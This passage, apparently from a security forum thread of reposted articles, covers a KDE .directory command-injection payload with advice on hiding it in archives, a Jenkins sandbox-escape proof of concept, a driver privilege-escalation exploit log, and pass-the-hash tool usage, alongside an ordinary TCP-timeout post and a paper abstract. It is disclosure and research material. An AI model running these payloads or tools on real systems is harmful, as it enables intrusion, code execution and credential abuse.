would be able to identify that there’s a malicious .directory file nested in one of those directories. If you’re expecting it, sure, but generally speaking, no suspicion would arise. nested directory payload $ mkdir httpd-2.4.39 $ cd httpd-2.4.39 $ mkdir test; cd test $ vi .directory [Desktop Entry] Type=Directory Icon[$e]=$(echo${IFS}0>~/Desktop/zer0.lol&) ZIP the archive & send it off. The moment the httpd-2.4.39 folder is opened in the file manager, the test directory will attempt to load the Icon, resulting in command execution. ZIP method (lone config file) The second option we have, is to “fake” our file extensions. I actually forgot to document this method in the original proof-of-concept, but that’s why I’m including it here now. As it turns out, when KDE doesn’t recognize a file extension, it attempts to be “smart”, and assign a mimetype. If the file contains [Desktop Entry] at the beginning, it’s assigned the application/x-desktop mimetype. Ultimately allowing the file to be processed by KConfig on load. Knowing this, we can make a fake TXT file with a character that closely resembles a “t”. To demonstrate how easy hiding the file is, I’ve used the httpd package again. Obviously the icon gives it away, but still, it’s much more discreet than having a random .desktop/.directory file. Again, as soon as this folder is opened, the code gets executed. Drag & Drop method (lone config file) Honestly this method is relatively useless, but I thought it would be cool in the demo, along with adding a potential social-engineering vector to the delivery of this payload. While I was picking apart KDE, I realized (accidentally) that you can actually drag and drop remote resources, and have a file-transfer trigger. This is all enabled by the KIO (kde input/output module) This basically allows users to drag and drop remote files and transfer them onto their local filesystem. Essentially, if we can SE a user to drag and drop a link, the file transfer will trigger and ultimately execute the arbitrary code the moment the file is loaded onto the system. 0x05 Outro Thanks to the KDE team, you no longer have to worry about this issue as long as the necessary patches have been made. Huge kudos to them for getting this issue patched within approximately 24 hours of being made aware. That’s a very impressive response. I’d also like to give big shoutout to the following friends of mine who were a huge help throughout the entire process. Check out the references for the weaponized payload Nux shared. Nux yuu References KDE 4/5 KDesktopfile (KConfig) Command Injection KDE Project Security Advisory KDE System Administration KDE ARBITRARY CODE EXECUTION AUTOCLEAN by Nux Sursa: https://zero.lol/2019-08-11-the-year-of-linux-on-the-desktop/
  20. Jenkins – Groovy Sandbox breakout (SECURITY-1538 / CVE-2019-10393, CVE-2019-10394, CVE-2019-10399, CVE-2019-10400) Recently, I discovered a sandbox breakout in the Groovy Sandbox used by the Jenkins script-security Plugin in their Pipeline Plugin for build scripts. We responsibly disclosed this vulnerability and in the current version of Jenkins it has been fixed and the according Jenkins Security Advisory 2019-09-12 has been published. In this blogpost I want to report a bit on the technical details of the vulnerability. Description The groovy sandbox transforms some AST nodes of the script to add security checks. For example ret = Runtime.getRuntime().exec("id") will be transformed to something like ret = Sandbox.call(Sandbox.call(Runtime.class, "getRuntime", []), "exec", ["id"]) Sandbox.call will check at runtime if the script can call the method with the given arguments. However, there were some cases in which the transformer did not transform child expressions, which then could do anything. 1.(untransformed)() 1.(untransformed) = 1 sometimesuntransformed++ In the first case the method name of a function call was not transformed. Who thought that a function name needs to be an identifier? The second case has the same problem but for the name of a property expression as the left-hand side of an assignment. For the last case the expression needs to not be of the form of a++, a++, a.b++. And in a.(b)++, b is also not transformed. This allowed everyone who was able to supply build scripts to execute commands as the Jenkins Master. PoC The script-security and pipeline plugins are required but installed by default. A user with job/configure permission is needed to change the script code. The following pipeline script will run the id shell command and throw and error with its output. @NonCPS def e(){ 1.({throw new Error("id".execute().text)}())(); } e(); @NonCPS is needed to disable a transformation step that would make problems. The expected output of this script after a build is: As seen in the output the command did run as Jenkins without approval of an administrator. Disclosure Timeline We responsibly disclosed this vulnerability and in the current version of Jenkins, it has been fixed and the according Jenkins Security Advisory 2019-09-12 has been published. The disclosure timeline was as follows: 12.09.2019 – Public disclosure of vulnerability 10.09.2019 – Vulnerabilities were assigned CVE-2019-10393, CVE-2019-10394, CVE-2019-10399, CVE-2019-10400 06.09.2019 – Report Conclusions Sandboxing is hard and a little oversight (that property names can be arbitrary expressions) can lead to escapes. I strongly recommend to update to the most current version if you use Jenkins, where this issue has been fixed and of course ensure proper patch and vulnerability management processes to be in place in general. Best, Nils Sursa: https://insinuator.net/2019/09/jenkins-groovy-sandbox-breakout-security-1538-cve-2019-10393-cve-2019-10394-cve-2019-10399-cve-2019-10400/
  21. When TCP sockets refuse to die Marek Majkowski September 20, 2019 3:53PM While working on our Spectrum server, we noticed something weird: the TCP sockets which we thought should have been closed were lingering around. We realized we don't really understand when TCP sockets are supposed to time out! Image by Sergiodc2 CC BY SA 3.0 In our code, we wanted to make sure we don't hold connections to dead hosts. In our early code we naively thought enabling TCP keepalives would be enough... but it isn't. It turns out a fairly modern TCP_USER_TIMEOUT socket option is equally as important. Furthermore it interacts with TCP keepalives in subtle ways. Many people are confused by this. In this blog post, we'll try to show how these options work. We'll show how a TCP socket can timeout during various stages of its lifetime, and how TCP keepalives and user timeout influence that. To better illustrate the internals of TCP connections, we'll mix the outputs of the tcpdump and the ss -o commands. This nicely shows the transmitted packets and the changing parameters of the TCP connections. SYN-SENT Let's start from the simplest case - what happens when one attempts to establish a connection to a server which discards inbound SYN packets? The scripts used here are available on our Github. $ sudo ./test-syn-sent.py # all packets dropped 00:00.000 IP host.2 > host.1: Flags [S] # initial SYN State Recv-Q Send-Q Local:Port Peer:Port SYN-SENT 0 1 host:2 host:1 timer:(on,940ms,0) 00:01.028 IP host.2 > host.1: Flags [S] # first retry 00:03.044 IP host.2 > host.1: Flags [S] # second retry 00:07.236 IP host.2 > host.1: Flags [S] # third retry 00:15.427 IP host.2 > host.1: Flags [S] # fourth retry 00:31.560 IP host.2 > host.1: Flags [S] # fifth retry 01:04.324 IP host.2 > host.1: Flags [S] # sixth retry 02:10.000 connect ETIMEDOUT Ok, this was easy. After the connect() syscall, the operating system sends a SYN packet. Since it didn't get any response the OS will by default retry sending it 6 times. This can be tweaked by the sysctl: $ sysctl net.ipv4.tcp_syn_retries net.ipv4.tcp_syn_retries = 6 It's possible to overwrite this setting per-socket with the TCP_SYNCNT setsockopt: setsockopt(sd, IPPROTO_TCP, TCP_SYNCNT, 6); The retries are staggered at 1s, 3s, 7s, 15s, 31s, 63s marks (the inter-retry time starts at 2s and then doubles each time). By default the whole process takes 130 seconds, until the kernel gives up with the ETIMEDOUT errno. At this moment in the lifetime of a connection, SO_KEEPALIVE settings are ignored, but TCP_USER_TIMEOUT is not. For example, setting it to 5000ms, will cause the following interaction: $ sudo ./test-syn-sent.py 5000 # all packets dropped 00:00.000 IP host.2 > host.1: Flags [S] # initial SYN State Recv-Q Send-Q Local:Port Peer:Port SYN-SENT 0 1 host:2 host:1 timer:(on,996ms,0) 00:01.016 IP host.2 > host.1: Flags [S] # first retry 00:03.032 IP host.2 > host.1: Flags [S] # second retry 00:05.016 IP host.2 > host.1: Flags [S] # what is this? 00:05.024 IP host.2 > host.1: Flags [S] # what is this? 00:05.036 IP host.2 > host.1: Flags [S] # what is this? 00:05.044 IP host.2 > host.1: Flags [S] # what is this? 00:05.050 connect ETIMEDOUT Even though we set user-timeout to 5s, we still saw the six SYN retries on the wire. This behaviour is probably a bug (as tested on 5.2 kernel): we would expect only two retries to be sent - at 1s and 3s marks and the socket to expire at 5s mark. Instead we saw this, but also we saw further 4 retransmitted SYN packets aligned to 5s mark - which makes no sense. Anyhow, we learned a thing - the TCP_USER_TIMEOUT does affect the behaviour of connect(). SYN-RECV SYN-RECV sockets are usually hidden from the application. They live as mini-sockets on the SYN queue. We wrote about the SYN and Accept queues in the past. Sometimes, when SYN cookies are enabled, the sockets may skip the SYN-RECV state altogether. In SYN-RECV state, the socket will retry sending SYN+ACK 5 times as controlled by: $ sysctl net.ipv4.tcp_synack_retries net.ipv4.tcp_synack_retries = 5 Here is how it looks on the wire: $ sudo ./test-syn-recv.py 00:00.000 IP host.2 > host.1: Flags [S] # all subsequent packets dropped 00:00.000 IP host.1 > host.2: Flags [S.] # initial SYN+ACK State Recv-Q Send-Q Local:Port Peer:Port SYN-RECV 0 0 host:1 host:2 timer:(on,996ms,0) 00:01.033 IP host.1 > host.2: Flags [S.] # first retry 00:03.045 IP host.1 > host.2: Flags [S.] # second retry 00:07.301 IP host.1 > host.2: Flags [S.] # third retry 00:15.493 IP host.1 > host.2: Flags [S.] # fourth retry 00:31.621 IP host.1 > host.2: Flags [S.] # fifth retry 01:04:610 SYN-RECV disappears With default settings, the SYN+ACK is re-transmitted at 1s, 3s, 7s, 15s, 31s marks, and the SYN-RECV socket disappears at the 64s mark. Neither SO_KEEPALIVE nor TCP_USER_TIMEOUT affect the lifetime of SYN-RECV sockets. Final handshake ACK After receiving the second packet in the TCP handshake - the SYN+ACK - the client socket moves to an ESTABLISHED state. The server socket remains in SYN-RECV until it receives the final ACK packet. Losing this ACK doesn't change anything - the server socket will just take a bit longer to move from SYN-RECV to ESTAB. Here is how it looks: 00:00.000 IP host.2 > host.1: Flags [S] 00:00.000 IP host.1 > host.2: Flags [S.] 00:00.000 IP host.2 > host.1: Flags [.] # initial ACK, dropped State Recv-Q Send-Q Local:Port Peer:Port SYN-RECV 0 0 host:1 host:2 timer:(on,1sec,0) ESTAB 0 0 host:2 host:1 00:01.014 IP host.1 > host.2: Flags [S.] 00:01.014 IP host.2 > host.1: Flags [.] # retried ACK, dropped State Recv-Q Send-Q Local:Port Peer:Port SYN-RECV 0 0 host:1 host:2 timer:(on,1.012ms,1) ESTAB 0 0 host:2 host:1 As you can see SYN-RECV, has the "on" timer, the same as in example before. We might argue this final ACK doesn't really carry much weight. This thinking lead to the development of TCP_DEFER_ACCEPT feature - it basically causes the third ACK to be silently dropped. With this flag set the socket remains in SYN-RECV state until it receives the first packet with actual data: $ sudo ./test-syn-ack.py 00:00.000 IP host.2 > host.1: Flags [S] 00:00.000 IP host.1 > host.2: Flags [S.] 00:00.000 IP host.2 > host.1: Flags [.] # delivered, but the socket stays as SYN-RECV State Recv-Q Send-Q Local:Port Peer:Port SYN-RECV 0 0 host:1 host:2 timer:(on,7.192ms,0) ESTAB 0 0 host:2 host:1 00:08.020 IP host.2 > host.1: Flags [P.], length 11 # payload moves the socket to ESTAB State Recv-Q Send-Q Local:Port Peer:Port ESTAB 11 0 host:1 host:2 ESTAB 0 0 host:2 host:1 The server socket remained in the SYN-RECV state even after receiving the final TCP-handshake ACK. It has a funny "on" timer, with the counter stuck at 0 retries. It is converted to ESTAB - and moved from the SYN to the accept queue - after the client sends a data packet or after the TCP_DEFER_ACCEPT timer expires. Basically, with DEFER ACCEPT the SYN-RECV mini-socket discards the data-less inbound ACK. Idle ESTAB is forever Let's move on and discuss a fully-established socket connected to an unhealthy (dead) peer. After completion of the handshake, the sockets on both sides move to the ESTABLISHED state, like: State Recv-Q Send-Q Local:Port Peer:Port ESTAB 0 0 host:2 host:1 ESTAB 0 0 host:1 host:2 These sockets have no running timer by default - they will remain in that state forever, even if the communication is broken. The TCP stack will notice problems only when one side attempts to send something. This raises a question - what to do if you don't plan on sending any data over a connection? How do you make sure an idle connection is healthy, without sending any data over it? This is where TCP keepalives come in. Let's see it in action - in this example we used the following toggles: SO_KEEPALIVE = 1 - Let's enable keepalives. TCP_KEEPIDLE = 5 - Send first keepalive probe after 5 seconds of idleness. TCP_KEEPINTVL = 3 - Send subsequent keepalive probes after 3 seconds. TCP_KEEPCNT = 3 - Time out after three failed probes. $ sudo ./test-idle.py 00:00.000 IP host.2 > host.1: Flags [S] 00:00.000 IP host.1 > host.2: Flags [S.] 00:00.000 IP host.2 > host.1: Flags [.] State Recv-Q Send-Q Local:Port Peer:Port ESTAB 0 0 host:1 host:2 ESTAB 0 0 host:2 host:1 timer:(keepalive,2.992ms,0) # all subsequent packets dropped 00:05.083 IP host.2 > host.1: Flags [.], ack 1 # first keepalive probe 00:08.155 IP host.2 > host.1: Flags [.], ack 1 # second keepalive probe 00:11.231 IP host.2 > host.1: Flags [.], ack 1 # third keepalive probe 00:14.299 IP host.2 > host.1: Flags [R.], seq 1, ack 1 Indeed! We can clearly see the first probe sent at the 5s mark, two remaining probes 3s apart - exactly as we specified. After a total of three sent probes, and a further three seconds of delay, the connection dies with ETIMEDOUT, and final the RST is transmitted. For keepalives to work, the send buffer must be empty. You can notice the keepalive timer active in the "timer:(keepalive)" line. Keepalives with TCP_USER_TIMEOUT are confusing We mentioned the TCP_USER_TIMEOUT option before. It sets the maximum amount of time that transmitted data may remain unacknowledged before the kernel forcefully closes the connection. On its own, it doesn't do much in the case of idle connections. The sockets will remain ESTABLISHED even if the connectivity is dropped. However, this socket option does change the semantics of TCP keepalives. The tcp(7) manpage is somewhat confusing: Moreover, when used with the TCP keepalive (SO_KEEPALIVE) option, TCP_USER_TIMEOUT will override keepalive to determine when to close a connection due to keepalive failure. The original commit message has slightly more detail: tcp: Add TCP_USER_TIMEOUT socket option To understand the semantics, we need to look at the kernel code in linux/net/ipv4/tcp_timer.c:693: if ((icsk->icsk_user_timeout != 0 && elapsed >= msecs_to_jiffies(icsk->icsk_user_timeout) && icsk->icsk_probes_out > 0) || For the user timeout to have any effect, the icsk_probes_out must not be zero. The check for user timeout is done only after the first probe went out. Let's check it out. Our connection settings: TCP_USER_TIMEOUT = 5*1000 - 5 seconds SO_KEEPALIVE = 1 - enable keepalives TCP_KEEPIDLE = 1 - send first probe quickly - 1 second idle TCP_KEEPINTVL = 11 - subsequent probes every 11 seconds TCP_KEEPCNT = 3 - send three probes before timing out 00:00.000 IP host.2 > host.1: Flags [S] 00:00.000 IP host.1 > host.2: Flags [S.] 00:00.000 IP host.2 > host.1: Flags [.] # all subsequent packets dropped 00:01.001 IP host.2 > host.1: Flags [.], ack 1 # first probe 00:12.233 IP host.2 > host.1: Flags [R.] # timer for second probe fired, socket aborted due to TCP_USER_TIMEOUT So what happened? The connection sent the first keepalive probe at the 1s mark. Seeing no response the TCP stack then woke up 11 seconds later to send a second probe. This time though, it executed the USER_TIMEOUT code path, which decided to terminate the connection immediately. What if we bump TCP_USER_TIMEOUT to larger values, say between the second and third probe? Then, the connection will be closed on the third probe timer. With TCP_USER_TIMEOUT set to 12.5s: 00:01.022 IP host.2 > host.1: Flags [.] # first probe 00:12.094 IP host.2 > host.1: Flags [.] # second probe 00:23.102 IP host.2 > host.1: Flags [R.] # timer for third probe fired, socket aborted due to TCP_USER_TIMEOUT We’ve shown how TCP_USER_TIMEOUT interacts with keepalives for small and medium values. The last case is when TCP_USER_TIMEOUT is extraordinarily large. Say we set it to 30s: 00:01.027 IP host.2 > host.1: Flags [.], ack 1 # first probe 00:12.195 IP host.2 > host.1: Flags [.], ack 1 # second probe 00:23.207 IP host.2 > host.1: Flags [.], ack 1 # third probe 00:34.211 IP host.2 > host.1: Flags [.], ack 1 # fourth probe! But TCP_KEEPCNT was only 3! 00:45.219 IP host.2 > host.1: Flags [.], ack 1 # fifth probe! 00:56.227 IP host.2 > host.1: Flags [.], ack 1 # sixth probe! 01:07.235 IP host.2 > host.1: Flags [R.], seq 1 # TCP_USER_TIMEOUT aborts conn on 7th probe timer We saw six keepalive probes on the wire! With TCP_USER_TIMEOUT set, the TCP_KEEPCNT is totally ignored. If you want TCP_KEEPCNT to make sense, the only sensible USER_TIMEOUT value is slightly smaller than: TCP_KEEPIDLE + TCP_KEEPINTVL * TCP_KEEPCNT Busy ESTAB socket is not forever Thus far we have discussed the case where the connection is idle. Different rules apply when the connection has unacknowledged data in a send buffer. Let's prepare another experiment - after the three-way handshake, let's set up a firewall to drop all packets. Then, let's do a send on one end to have some dropped packets in-flight. An experiment shows the sending socket dies after ~16 minutes: 00:00.000 IP host.2 > host.1: Flags [S] 00:00.000 IP host.1 > host.2: Flags [S.] 00:00.000 IP host.2 > host.1: Flags [.] # All subsequent packets dropped 00:00.206 IP host.2 > host.1: Flags [P.], length 11 # first data packet 00:00.412 IP host.2 > host.1: Flags [P.], length 11 # early retransmit, doesn't count 00:00.620 IP host.2 > host.1: Flags [P.], length 11 # 1st retry 00:01.048 IP host.2 > host.1: Flags [P.], length 11 # 2nd retry 00:01.880 IP host.2 > host.1: Flags [P.], length 11 # 3rd retry State Recv-Q Send-Q Local:Port Peer:Port ESTAB 0 0 host:1 host:2 ESTAB 0 11 host:2 host:1 timer:(on,1.304ms,3) 00:03.543 IP host.2 > host.1: Flags [P.], length 11 # 4th 00:07.000 IP host.2 > host.1: Flags [P.], length 11 # 5th 00:13.656 IP host.2 > host.1: Flags [P.], length 11 # 6th 00:26.968 IP host.2 > host.1: Flags [P.], length 11 # 7th 00:54.616 IP host.2 > host.1: Flags [P.], length 11 # 8th 01:47.868 IP host.2 > host.1: Flags [P.], length 11 # 9th 03:34.360 IP host.2 > host.1: Flags [P.], length 11 # 10th 05:35.192 IP host.2 > host.1: Flags [P.], length 11 # 11th 07:36.024 IP host.2 > host.1: Flags [P.], length 11 # 12th 09:36.855 IP host.2 > host.1: Flags [P.], length 11 # 13th 11:37.692 IP host.2 > host.1: Flags [P.], length 11 # 14th 13:38.524 IP host.2 > host.1: Flags [P.], length 11 # 15th 15:39.500 connection ETIMEDOUT The data packet is retransmitted 15 times, as controlled by: $ sysctl net.ipv4.tcp_retries2 net.ipv4.tcp_retries2 = 15 From the ip-sysctl.txt documentation: The default value of 15 yields a hypothetical timeout of 924.6 seconds and is a lower bound for the effective timeout. TCP will effectively time out at the first RTO which exceeds the hypothetical timeout. The connection indeed died at ~940 seconds. Notice the socket has the "on" timer running. It doesn't matter at all if we set SO_KEEPALIVE - when the "on" timer is running, keepalives are not engaged. TCP_USER_TIMEOUT keeps on working though. The connection will be aborted exactly after user-timeout specified time since the last received packet. With the user timeout set the tcp_retries2 value is ignored. Zero window ESTAB is... forever? There is one final case worth mentioning. If the sender has plenty of data, and the receiver is slow, then TCP flow control kicks in. At some point the receiver will ask the sender to stop transmitting new data. This is a slightly different condition than the one described above. In this case, with flow control engaged, there is no in-flight or unacknowledged data. Instead the receiver throttles the sender with a "zero window" notification. Then the sender periodically checks if the condition is still valid with "window probes". In this experiment we reduced the receive buffer size for simplicity. Here's how it looks on the wire: 00:00.000 IP host.2 > host.1: Flags [S] 00:00.000 IP host.1 > host.2: Flags [S.], win 1152 00:00.000 IP host.2 > host.1: Flags [.] 00:00.202 IP host.2 > host.1: Flags [.], length 576 # first data packet 00:00.202 IP host.1 > host.2: Flags [.], ack 577, win 576 00:00.202 IP host.2 > host.1: Flags [P.], length 576 # second data packet 00:00.244 IP host.1 > host.2: Flags [.], ack 1153, win 0 # throttle it! zero-window 00:00.456 IP host.2 > host.1: Flags [.], ack 1 # zero-window probe 00:00.456 IP host.1 > host.2: Flags [.], ack 1153, win 0 # nope, still zero-window State Recv-Q Send-Q Local:Port Peer:Port ESTAB 1152 0 host:1 host:2 ESTAB 0 129920 host:2 host:1 timer:(persist,048ms,0) The packet capture shows a couple of things. First, we can see two packets with data, each 576 bytes long. They both were immediately acknowledged. The second ACK had "win 0" notification: the sender was told to stop sending data. But the sender is eager to send more! The last two packets show a first "window probe": the sender will periodically send payload-less "ack" packets to check if the window size had changed. As long as the receiver keeps on answering, the sender will keep on sending such probes forever. The socket information shows three important things: The read buffer of the reader is filled - thus the "zero window" throttling is expected. The write buffer of the sender is filled - we have more data to send. The sender has a "persist" timer running, counting the time until the next "window probe". In this blog post we are interested in timeouts - what will happen if the window probes are lost? Will the sender notice? By default the window probe is retried 15 times - adhering to the usual tcp_retries2 setting. The tcp timer is in persist state, so the TCP keepalives will not be running. The SO_KEEPALIVE settings don't make any difference when window probing is engaged. As expected, the TCP_USER_TIMEOUT toggle keeps on working. A slight difference is that similarly to user-timeout on keepalives, it's engaged only when the retransmission timer fires. During such an event, if more than user-timeout seconds since the last good packet passed, the connection will be aborted. Note about using application timeouts In the past we have shared an interesting war story: The curious case of slow downloads Our HTTP server gave up on the connection after an application-managed timeout fired. This was a bug - a slow connection might have correctly slowly drained the send buffer, but the application server didn't notice that. We abruptly dropped slow downloads, even though this wasn't our intention. We just wanted to make sure the client connection was still healthy. It would be better to use TCP_USER_TIMEOUT than rely on application-managed timeouts. But this is not sufficient. We also wanted to guard against a situation where a client stream is valid, but is stuck and doesn't drain the connection. The only way to achieve this is to periodically check the amount of unsent data in the send buffer, and see if it shrinks at a desired pace. For typical applications sending data to the Internet, I would recommend: Enable TCP keepalives. This is needed to keep some data flowing in the idle-connection case. Set TCP_USER_TIMEOUT to TCP_KEEPIDLE + TCP_KEEPINTVL * TCP_KEEPCNT. Be careful when using application-managed timeouts. To detect TCP failures use TCP keepalives and user-timeout. If you want to spare resources and make sure sockets don't stay alive for too long, consider periodically checking if the socket is draining at the desired pace. You can use ioctl(TIOCOUTQ) for that, but it counts both data buffered (notsent) on the socket and in-flight (unacknowledged) bytes. A better way is to use TCP_INFO tcpi_notsent_bytes parameter, which reports only the former counter. An example of checking the draining pace: while True: notsent1 = get_tcp_info(c).tcpi_notsent_bytes notsent1_ts = time.time() ... poll.poll(POLL_PERIOD) ... notsent2 = get_tcp_info(c).tcpi_notsent_bytes notsent2_ts = time.time() pace_in_bytes_per_second = (notsent1 - notsent2) / (notsent2_ts - notsent1_ts) if pace_in_bytes_per_second > 12000: # pace is above effective rate of 96Kbps, ok! else: # socket is too slow... There are ways to further improve this logic. We could use TCP_NOTSENT_LOWAT, although it's generally only useful for situations where the send buffer is relatively empty. Then we could use the SO_TIMESTAMPING interface for notifications about when data gets delivered. Finally, if we are done sending the data to the socket, it's possible to just call close() and defer handling of the socket to the operating system. Such a socket will be stuck in FIN-WAIT-1 or LAST-ACK state until it correctly drains. Summary In this post we discussed five cases where the TCP connection may notice the other party going away: SYN-SENT: The duration of this state can be controlled by TCP_SYNCNT or tcp_syn_retries. SYN-RECV: It's usually hidden from application. It is tuned by tcp_synack_retries. Idling ESTABLISHED connection, will never notice any issues. A solution is to use TCP keepalives. Busy ESTABLISHED connection, adheres to tcp_retries2 setting, and ignores TCP keepalives. Zero-window ESTABLISHED connection, adheres to tcp_retries2 setting, and ignores TCP keepalives. Especially the last two ESTABLISHED cases can be customized with TCP_USER_TIMEOUT, but this setting also affects other situations. Generally speaking, it can be thought of as a hint to the kernel to abort the connection after so-many seconds since the last good packet. This is a dangerous setting though, and if used in conjunction with TCP keepalives should be set to a value slightly lower than TCP_KEEPIDLE + TCP_KEEPINTVL * TCP_KEEPCNT. Otherwise it will affect, and potentially cancel out, the TCP_KEEPCNT value. In this post we presented scripts showing the effects of timeout-related socket options under various network conditions. Interleaving the tcpdump packet capture with the output of ss -o is a great way of understanding the networking stack. We were able to create reproducible test cases showing the "on", "keepalive" and "persist" timers in action. This is a very useful framework for further experimentation. Finally, it's surprisingly hard to tune a TCP connection to be confident that the remote host is actually up. During our debugging we found that looking at the send buffer size and currently active TCP timer can be very helpful in understanding whether the socket is actually healthy. The bug in our Spectrum application turned out to be a wrong TCP_USER_TIMEOUT setting - without it sockets with large send buffers were lingering around for way longer than we intended. The scripts used in this article can be found on our Github. Figuring this out has been a collaboration across three Cloudflare offices. Thanks to Hiren Panchasara from San Jose, Warren Nelson from Austin and Jakub Sitnicki from Warsaw. Fancy joining the team? Apply here! Sursa: https://blog.cloudflare.com/when-tcp-sockets-refuse-to-die/
  22. hielding applications from an untrusted cloud with Haven Andrew Baumann Marcus Peinado Galen Hunt 11th USENIX Symposium on Operating Systems Design and Implementation (OSDI '14) | October 2014 Published by USENIX - Advanced Computing Systems Association Best Paper Award View Publication Download BibTex Today’s cloud computing infrastructure requires substantial trust. Cloud users rely on both the provider’s staff and its globally-distributed software/hardware platform not to expose any of their private data. We introduce the notion of shielded execution, which protects the confidentiality and integrity of a program and its data from the platform on which it runs (i.e., the cloud operator’s OS, VM and firmware). Our prototype, Haven, is the first system to achieve shielded execution of unmodified legacy applications, including SQL Server and Apache, on a commodity OS (Windows) and commodity hardware. Haven leverages the hardware protection of Intel SGX to defend against privileged code and physical attacks such as memory probes, but also addresses the dual challenges of executing unmodified legacy binaries and protecting them from a malicious host. This work motivated recent changes in the SGX specification. Download PDF Sursa: https://www.microsoft.com/en-us/research/publication/shielding-applications-from-an-untrusted-cloud-with-haven/
  23. CVE-2019-16098 The driver in Micro-Star MSI Afterburner 4.6.2.15658 (aka RTCore64.sys and RTCore32.sys) allows any authenticated user to read and write to arbitrary memory, I/O ports, and MSRs. This can be exploited for privilege escalation, code execution under high privileges, and information disclosure. These signed drivers can also be used to bypass the Microsoft driver-signing policy to deploy malicious code. For more updates, visit CVE-2019-16098 WARNING: Hardcoded Windows 10 x64 Version 1903 offsets! Microsoft Windows [Version 10.0.18362.295] (c) 2019 Microsoft Corporation. All rights reserved. C:\Users\Barakat\source\repos\CVE-2019-16098>whoami Barakat C:\Users\Barakat\source\repos\CVE-2019-16098>out\build\x64-Debug\CVE-2019-16098.exe [*] Device object handle has been obtained [*] Ntoskrnl base address: FFFFF80734200000 [*] PsInitialSystemProcess address: FFFFC288A607F300 [*] System process token: FFFF9703A9E061B0 [*] Current process address: FFFFC288B7959400 [*] Current process token: FFFF9703B9D785F0 [*] Stealing System process token ... [*] Spawning new shell ... Microsoft Windows [Version 10.0.18362.295] (c) 2019 Microsoft Corporation. All rights reserved. C:\Users\Barakat\source\repos\CVE-2019-16098>whoami SYSTEM C:\Users\Barakat\source\repos\CVE-2019-16098> Sursa: https://github.com/Barakat/CVE-2019-16098
  24. Invoke-TheHash Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side. Requirements Minimum PowerShell 2.0 Import Import-Module ./Invoke-TheHash.psd1 or . ./Invoke-WMIExec.ps1 . ./Invoke-SMBExec.ps1 . ./Invoke-SMBEnum.ps1 . ./Invoke-SMBClient.ps1 . ./Invoke-TheHash.ps1 Functions Invoke-WMIExec Invoke-SMBExec Invoke-SMBEnum Invoke-SMBClient Invoke-TheHash Invoke-WMIExec WMI command execution function. Parameters: Target - Hostname or IP address of target. Username - Username to use for authentication. Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format. Command - Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. Sleep - Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds. Example: Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose Screenshot: Invoke-SMBExec SMB (PsExec) command execution function supporting SMB1, SMB2.1, with and without SMB signing. Parameters: Target - Hostname or IP address of target. Username - Username to use for authentication. Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format. Command - Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to SCM on the target. CommandCOMSPEC - Default = Enabled: Prepend %COMSPEC% /C to Command. Service - Default = 20 Character Random: Name of the service to create and delete on the target. Sleep - Default = 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds. Version - Default = Auto: (Auto,1,2.1) Force SMB version. The default behavior is to perform SMB version negotiation and use SMB2.1 if supported by the target. Example: Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose Example: Check SMB signing requirements on target. Invoke-SMBExec -Target 192.168.100.20 Screenshot: Invoke-SMBEnum Invoke-SMBEnum performs User, Group, NetSession and Share enumeration tasks over SMB2.1 with and without SMB signing. Parameters: Target - Hostname or IP address of target. Username - Username to use for authentication. Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format. Action - (All,Group,NetSession,Share,User) Default = Share: Enumeration action to perform. Group - Default = Administrators: Group to enumerate. Sleep - Default = 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds. Version - Default = Auto: (Auto,1,2.1) Force SMB version. The default behavior is to perform SMB version negotiation and use SMB2.1 if supported by the target. Note, only the signing check works with SMB1. Example: Invoke-SMBEnum -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -verbose Screenshot: Invoke-SMBClient SMB client function supporting SMB2.1 and SMB signing. This function primarily provides SMB file share capabilities for working with hashes that do not have remote command execution privilege. This function can also be used for staging payloads for use with Invoke-WMIExec and Invoke-SMBExec. Note that Invoke-SMBClient is built on the .NET TCPClient and does not use the Windows SMB client. Invoke-SMBClient is much slower than the Windows client. Parameters: Username - Username to use for authentication. Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format. Action - Default = List: (List/Recurse/Delete/Get/Put) Action to perform. List: Lists the contents of a directory. Recurse: Lists the contents of a directory and all subdirectories. Delete: Deletes a file. Get: Downloads a file. Put: Uploads a file and sets the creation, access, and last write times to match the source file. Source List and Recurse: UNC path to a directory. Delete: UNC path to a file. Get: UNC path to a file. Put: File to upload. If a full path is not specified, the file must be in the current directory. When using the 'Modify' switch, 'Source' must be a byte array. Destination List and Recurse: Not used. Delete: Not used. Get: If used, value will be the new filename of downloaded file. If a full path is not specified, the file will be created in the current directory. Put: UNC path for uploaded file. The filename must be specified. Modify List and Recurse: The function will output an object consisting of directory contents. Delete: Not used. Get: The function will output a byte array of the downloaded file instead of writing the file to disk. It's advisable to use this only with smaller files and to send the output to a variable. Put: Uploads a byte array to a new destination file. NoProgress - Prevents displaying an upload and download progress bar. Sleep - Default = 100 Milliseconds: Sets the function's Start-Sleep values in milliseconds. Version - Default = Auto: (Auto,1,2.1) Force SMB version. The default behavior is to perform SMB version negotiation and use SMB2.1 if supported by the target. Note, only the signing check works with SMB1. Example: List the contents of a root share directory. Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash 